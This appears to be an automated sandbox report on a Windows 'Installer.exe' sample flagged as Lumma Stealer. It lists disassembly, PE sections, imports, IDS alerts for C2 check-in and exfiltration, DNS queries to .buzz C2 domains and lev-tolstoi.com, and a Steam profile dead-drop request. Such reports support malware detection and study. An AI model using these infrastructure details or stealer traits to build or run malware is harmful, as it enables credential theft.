cmp ecx, edi
je 00007EFDFCAE4456h
test esi, ecx
jne 00007EFDFCAE4478h
call 00007EFDFCAE4481h
mov ecx, eax
cmp ecx, edi
                                                                                                                                                                                                                                                  jne 00007EFDFCAE4459h
                                                                                                                                                                                                                                                  mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                  jmp 00007EFDFCAE4460h
                                                                                                                                                                                                                                                  test esi, ecx
                                                                                                                                                                                                                                                  jne 00007EFDFCAE445Ch
                                                                                                                                                                                                                                                  or eax, 00004711h
                                                                                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                                                                                  or ecx, eax
                                                                                                                                                                                                                                                  mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                                  not ecx
                                                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                                                  mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 14h
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  xorps xmm0, xmm0
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                  call dword ptr [00436D00h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB8h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  call dword ptr [00436CB4h]
                                                                                                                                                                                                                                                  xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call dword ptr [00436D50h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                  xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                  xor eax, ecx
                                                                                                                                                                                                                                                  leave
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  mov eax, 00004000h
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 0043CF48h
                                                                                                                                                                                                                                                  call dword ptr [00436D28h]
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push 00030000h
                                                                                                                                                                                                                                                  push 00010000h
                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                  call 00007EFDFCAEB233h
                                                                                                                                                                                                                                                  add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36a7c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8f000 | 0x3fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8a800 | 0x2628 | .bss
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3f000 | 0x2744 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x32608 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ea98 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x36c3c | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2b4ca | 0x2b600 | ebf84c6b836020b1a66433a898baeab7 | False | 0.5443702719740634 | data | 6.596404756541432 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2d000 | 0xc50c | 0xc600 | 96e76e7ef084461591b1dcd4c2131f05 | False | 0.40260022095959597 | data | 4.741850626178578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x3714 | 0x2800 | d87fd4546a2b39263a028b496b33108f | False | 0.29814453125 | data | 5.024681407682101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x3e000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3f000 | 0x2744 | 0x2800 | c7508b57e36483307c47b7dd73fc0c85 | False | 0.75166015625 | data | 6.531416896423856 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x42000 | 0x4d000 | 0x4d000 | a20e827dffb35f9fff89825936fba1a1 | False | 1.0003360896915585 | data | 7.999398974295207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x8f000 | 0x3fc | 0x400 | 6d588082959117d83b5b94b45915208a | False | 0.4423828125 | data | 3.391431520369637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8f058 | 0x3a4 | data | English | United States | 0.44849785407725323
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | ShowWindow
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T23:13:25.610456+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 23.55.153.106 | 443 | TCP
2024-12-27T23:13:26.465709+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49734 | 23.55.153.106 | 443 | TCP
2024-12-27T23:13:28.309145+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:29.065912+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:29.065912+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:30.378308+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:31.195519+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:31.195519+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:32.784606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:35.188581+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:37.425413+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:40.144074+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:40.950937+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49741 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:42.627339+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:46.299504+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-27T23:13:47.067796+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49747 | 104.21.66.86 | 443 | TCP
TCP packet trace: Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789355040 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789411068 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789417982 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763356924 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763458014 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763519049 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763688087 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763700008 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931615114 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931668043 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931737900 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.932094097 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.932111025 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.188515902 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.188580990 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192049980 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192065954 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192270994 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193682909 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193862915 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193890095 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014717102 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014786959 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014844894 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.015113115 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.015130997 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195837021 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195873022 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195950031 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.196253061 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.196263075 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.425291061 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.425412893 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.426806927 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.426819086 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.427042961 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428205967 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428385973 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428415060 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428476095 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428484917 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.376885891 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.376960993 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377012968 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377274036 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377288103 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837332964 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837380886 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837457895 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.838051081 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.838073015 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.143580914 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.144073963 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147255898 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147265911 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147505045 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148724079 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148724079 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148762941 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.950920105 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.950997114 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951047897 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951221943 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951240063 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365425110 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365470886 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365552902 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365998030 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.366013050 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.627253056 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.627338886 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628695965 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628712893 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628926992 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.635778904 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636569977 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636605024 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636809111 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636848927 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636941910 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636985064 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637785912 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637809038 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637943029 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637969017 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638221979 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638247967 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638254881 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638394117 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638410091 CET49743443192.168.2.4104.21.66.86
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 23:13:22.520955086 CET | 192.168.2.4 | 1.1.1.1 | 0x8140 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:22.750802040 CET | 192.168.2.4 | 1.1.1.1 | 0x4033 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:22.892683983 CET | 192.168.2.4 | 1.1.1.1 | 0xd4a7 | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.032330990 CET | 192.168.2.4 | 1.1.1.1 | 0x2e10 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.173218966 CET | 192.168.2.4 | 1.1.1.1 | 0xd367 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.313226938 CET | 192.168.2.4 | 1.1.1.1 | 0xd3a1 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.454549074 CET | 192.168.2.4 | 1.1.1.1 | 0xd334 | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.593933105 CET | 192.168.2.4 | 1.1.1.1 | 0xf1a0 | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.754492044 CET | 192.168.2.4 | 1.1.1.1 | 0xe88c | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.907233953 CET | 192.168.2.4 | 1.1.1.1 | 0x23ac | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:26.720062971 CET | 192.168.2.4 | 1.1.1.1 | 0x5a04 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 23:13:22.748270988 CET | 1.1.1.1 | 192.168.2.4 | 0x8140 | Name error (3) | mindhandru.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:22.889348984 CET | 1.1.1.1 | 192.168.2.4 | 0x4033 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.030627966 CET | 1.1.1.1 | 192.168.2.4 | 0xd4a7 | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.170358896 CET | 1.1.1.1 | 192.168.2.4 | 0x2e10 | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.310623884 CET | 1.1.1.1 | 192.168.2.4 | 0xd367 | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.451231003 CET | 1.1.1.1 | 192.168.2.4 | 0xd3a1 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.592180967 CET | 1.1.1.1 | 192.168.2.4 | 0xd334 | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.731961012 CET | 1.1.1.1 | 192.168.2.4 | 0xf1a0 | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:23.894794941 CET | 1.1.1.1 | 192.168.2.4 | 0xe88c | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:24.127640963 CET | 1.1.1.1 | 192.168.2.4 | 0x23ac | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:26.952869892 CET | 1.1.1.1 | 192.168.2.4 | 0x5a04 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 23:13:26.952869892 CET | 1.1.1.1 | 192.168.2.4 | 0x5a04 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• lev-tolstoi.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49734 | 23.55.153.106 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe |

Timestamp | Bytes transferred | Direction | Data

2024-12-27 22:13:25 UTC | 219 | OUT
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

2024-12-27 22:13:26 UTC | 1905 | IN
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:26 GMT
                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=fd92c37599526c48ee9a2e2b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
